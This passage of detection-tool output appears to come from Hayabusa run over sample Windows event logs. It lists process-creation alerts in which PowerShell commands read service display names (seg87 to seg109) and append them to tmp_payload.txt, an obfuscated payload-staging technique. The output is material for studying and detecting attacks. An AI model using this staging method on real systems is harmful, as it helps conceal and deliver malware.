Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:33.398 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4d8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:34.891 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x29c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:34.891 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xafc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:36.365 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:36.365 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3d8 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:37.818 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:37.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:39.275 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:39.275 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:40.758 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:40.758 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:42.211 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf90 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:42.227 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:43.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:43.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:45.132 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:45.132 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe8c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:46.606 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:46.606 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:48.052 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:48.067 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xee8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:49.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:49.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x420 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:50.946 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbf8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:50.946 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaa0 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:52.406 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:52.406 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x618 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:53.855 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:53.855 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:55.301 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:55.317 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:56.773 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:56.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:58.226 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:58.226 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdf0 | User: FS03$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:59.674 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:59.674 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:01.121 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:01.121 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:02.569 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:02.585 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfa4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:04.023 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:04.023 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:05.464 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:05.464 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x608 | User: FS03$ | 
